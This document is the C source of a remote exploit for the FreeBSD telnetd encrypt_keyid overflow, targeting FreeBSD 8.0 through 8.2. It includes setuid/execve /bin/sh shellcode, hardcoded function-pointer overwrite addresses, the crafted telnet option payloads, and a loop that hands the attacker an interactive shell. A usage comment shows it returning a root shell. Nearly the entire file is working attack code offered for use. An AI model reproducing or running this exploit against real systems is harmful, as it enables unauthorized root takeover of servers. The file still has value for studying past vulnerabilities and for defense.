/*************************************************************************** *

1. /***************************************************************************
2. * telnetd-encrypt_keyid.c
3. *
4. * Mon Dec 26 20:37:05 CET 2011
5. * Copyright 2011 Jaime Penalba Estebanez (NighterMan)
6. *
7. * nighterman@painsec.com - jpenalbae@gmail.com
8. * Credits to batchdrake as always
9. *
10. * ______ __ ________
11. * / __ / /_/ / _____/
12. * / /_/ /______________\ \_____________
13. * / ___ / __ / / __ / \ \/ _ \/ __/
14. * / / / /_/ / / / / /___/ / __/ /__
15. * ____/__/____\__,_/_/_/ /_/______/\___/\____/____
16. *
17. *
18. ****************************************************************************/
19.  
20. /*
21. *
22. * Usage:
23. *
24. * $ gcc exploit.c -o exploit
25. *
26. * $ ./exploit 127.0.0.1 23 1
27. * [<] Succes reading intial server request 3 bytes
28. * [>] Telnet initial encryption mode and IV sent
29. * [<] Server response: 8 bytes read
30. * [>] First payload to overwrite function pointer sent
31. * [<] Server response: 6 bytes read
32. * [>] Second payload to triger the function pointer
33. * [*] got shell?
34. * uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
35. *
36. */
37.  
38.  
39. #include <stdio.h>
40. #include <stdlib.h>
41. #include <string.h>
42. #include <unistd.h>
43. #include <errno.h>
44. #include <sys/time.h>
45. #include <sys/socket.h>
46. #include <netinet/in.h>
47. #include <arpa/inet.h>
48.  
49.  
50. #define MAXKEYLEN 64-1
51.  
52. struct key_info
53. {
54. unsigned char keyid[MAXKEYLEN];
55. unsigned char keylen[4];
56. unsigned char dir[4];
57. unsigned char modep[4];
58. unsigned char getcrypt[4];
59. };
60.  
61.  
62. static unsigned char shellcode[] =
63. "\x31\xc0" // xor %eax,%eax
64. "\x50" // push %eax
65. "\xb0\x17" // mov $0x17,%al
66. "\x50" // push %eax
67. "\xcd\x80" // int $0x80
68. "\x50" // push %eax
69. "\x68\x6e\x2f\x73\x68" // push $0x68732f6e
70. "\x68\x2f\x2f\x62\x69" // push $0x69622f2f
71. "\x89\xe3" // mov %esp,%ebx
72. "\x50" // push %eax
73. "\x54" // push %esp
74. "\x53" // push %ebx
75. "\x50" // push %eax
76. "\xb0\x3b" // mov $0x3b,%al
77. "\xcd\x80"; // int $0x80
78.  
79. static unsigned char tnet_init_enc[] =
80. "\xff\xfa\x26\x00\x01\x01\x12\x13"
81. "\x14\x15\x16\x17\x18\x19\xff\xf0";
82.  
83. static unsigned char tnet_option_enc_keyid[] = "\xff\xfa\x26\x07";
84. static unsigned char tnet_end_suboption[] = "\xff\xf0";
85.  
86.  
87. /*
88. * shell(): semi-interactive shell hack
89. */
90. static void shell(int fd)
91. {
92. fd_set fds;
93. char tmp[128];
94. int n;
95.  
96. /* check uid */
97. write(fd, "id\n", 3);
98.  
99. /* semi-interactive shell */
100. for (;;) {
101. FD_ZERO(&fds);
102. FD_SET(fd, &fds);
103. FD_SET(0, &fds);
104.  
105. if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
106. perror("select");
107. break;
108. }
109.  
110. /* read from fd and write to stdout */
111. if (FD_ISSET(fd, &fds)) {
112. if ((n = read(fd, tmp, sizeof(tmp))) < 0) {
113. fprintf(stderr, "Goodbye...\n");
114. break;
115. }
116. if (write(1, tmp, n) < 0) {
117. perror("write");
118. break;
119. }
120. }
121.  
122. /* read from stdin and write to fd */
123. if (FD_ISSET(0, &fds)) {
124. if ((n = read(0, tmp, sizeof(tmp))) < 0) {
125. perror("read");
126. break;
127. }
128. if (write(fd, tmp, n) < 0) {
129. perror("write");
130. break;
131. }
132. }
133. }
134.  
135. close(fd);
136. exit(1);
137. }
138.  
139.  
140. static int open_connection(in_addr_t dip, int dport)
141. {
142. int pconn;
143. struct sockaddr_in cdata;
144. struct timeval timeout;
145.  
146. /* timeout.tv_sec = _opts.timeout; */
147. timeout.tv_sec = 8;
148. timeout.tv_usec = 0;
149.  
150. /* Set socket options and create it */
151. cdata.sin_addr.s_addr = dip;
152. cdata.sin_port = htons(dport);
153. cdata.sin_family = AF_INET;
154.  
155. pconn = socket(AF_INET, SOCK_STREAM, 0);
156.  
157. if( pconn < 0 )
158. {
159. printf("Socket error: %i\n", pconn);
160. printf("Err message: %s\n", strerror(errno));
161. exit(-1);
162. }
163.  
164. /* Set socket timeout */
165. if ( setsockopt(pconn, SOL_SOCKET, SO_RCVTIMEO,
166. (void *)&timeout, sizeof(struct timeval)) != 0)
167. {
168. perror("setsockopt SO_RCVTIMEO: ");
169. exit(1);
170. }
171.  
172. /* Set socket options */
173. if ( setsockopt(pconn, SOL_SOCKET, SO_SNDTIMEO,
174. (void *)&timeout, sizeof(struct timeval)) != 0)
175. {
176. perror("setsockopt SO_SNDTIMEO: ");
177. exit(1);
178. }
179.  
180. /* Make connection */
181. if (connect(pconn,(struct sockaddr *) &cdata, sizeof(cdata)) != 0)
182. {
183. close(pconn);
184. return -1;
185. }
186.  
187. return pconn;
188. }
189.  
190.  
191.  
192. static void usage(char *arg)
193. {
194. printf("Telnetd encrypt_keyid exploit for FreeBSD\n");
195. printf("NighterMan <nighterman@painsec.com>\n\n");
196. printf("Usage: %s [ip] [port] [target]\n", arg);
197. printf("Available Targets:\n");
198. printf(" - 1: FreeBSD 8.0 & 8.1\n");
199. printf(" - 2: FreeBSD 8.2\n\n");
200. }
201.  
202.  
203.  
204. int main(int argc, char *argv[])
205. {
206. /* Payload Size */
207. int psize = (sizeof(struct key_info) +
208. sizeof(tnet_option_enc_keyid) +
209. sizeof(tnet_end_suboption));
210.  
211. struct key_info bad_struct;
212. unsigned char payload[psize];
213. unsigned char readbuf[256];
214.  
215. int ret;
216. int conn;
217. int offset = 0;
218.  
219. if ( argc != 4) {
220. usage(argv[0]);
221. return -1;
222. }
223.  
224. /* Fill the structure */
225. memset(&bad_struct, 0x90, sizeof(struct key_info));
226. memcpy(&bad_struct.keyid[20], shellcode, sizeof(shellcode));
227. memcpy(bad_struct.keylen, "DEAD", 4);
228. memcpy(bad_struct.dir, "BEEF", 4);
229. memcpy(bad_struct.modep, "\x6c\x6f\x05\x08", 4); /* Readable address */
230.  
231. /* Shellcode address (function pointer overwrite) */
232. switch (atoi(argv[3])) {
233. case 1:
234. memcpy(bad_struct.getcrypt, "\xa6\xee\x05\x08", 4);
235. break;
236.  
237. case 2:
238. memcpy(bad_struct.getcrypt, "\xed\xee\x05\x08", 4);
239. break;
240.  
241. default:
242. printf("Bad target\n");
243. return -1;
244. break;
245. }
246.  
247. /* Prepare the payload with the overflow */
248. memcpy(payload, tnet_option_enc_keyid, sizeof(tnet_option_enc_keyid));
249. offset += sizeof(tnet_option_enc_keyid);
250. memcpy(&payload[offset], &bad_struct, sizeof(bad_struct));
251. offset += sizeof(bad_struct);
252. memcpy(&payload[offset], tnet_end_suboption, sizeof(tnet_end_suboption));
253.  
254.  
255. /* Open the connection */
256. conn = open_connection(inet_addr(argv[1]), atoi(argv[2]));
257. if (conn == -1) {
258. printf("Error connecting: %i\n", errno);
259. return -1;
260. }
261.  
262. /* Read initial server request */
263. ret = read(conn, readbuf, 256);
264. printf("[<] Succes reading intial server request %i bytes\n", ret);
265.  
266.  
267. /* Send encryption and IV */
268. ret = write(conn, tnet_init_enc, sizeof(tnet_init_enc));
269. if (ret != sizeof(tnet_init_enc)) {
270. printf("Error sending init encryption: %i\n", ret);
271. return -1;
272. }
273. printf("[>] Telnet initial encryption mode and IV sent\n");
274.  
275. /* Read response */
276. ret = read(conn, readbuf, 256);
277. printf("[<] Server response: %i bytes read\n", ret);
278.  
279. /* Send the first payload with the overflow */
280. ret = write(conn, payload, psize);
281. if (ret != psize) {
282. printf("Error sending payload first time\n");
283. return -1;
284. }
285. printf("[>] First payload to overwrite function pointer sent\n");
286.  
287. /* Read Response */
288. ret = read(conn, readbuf, 256);
289. printf("[<] Server response: %i bytes read\n", ret);
290.  
291.  
292. /* Send the payload again to tigger the function overwrite */
293. ret = write(conn, payload, psize);
294. if (ret != psize) {
295. printf("Error sending payload second time\n");
296. return -1;
297. }
298. printf("[>] Second payload to triger the function pointer\n");
299.  
300.  
301. /* Start the semi interactive shell */
302. printf("[*] got shell?\n");
303. shell(conn);
304.  
305.  
306. return 0;
307. }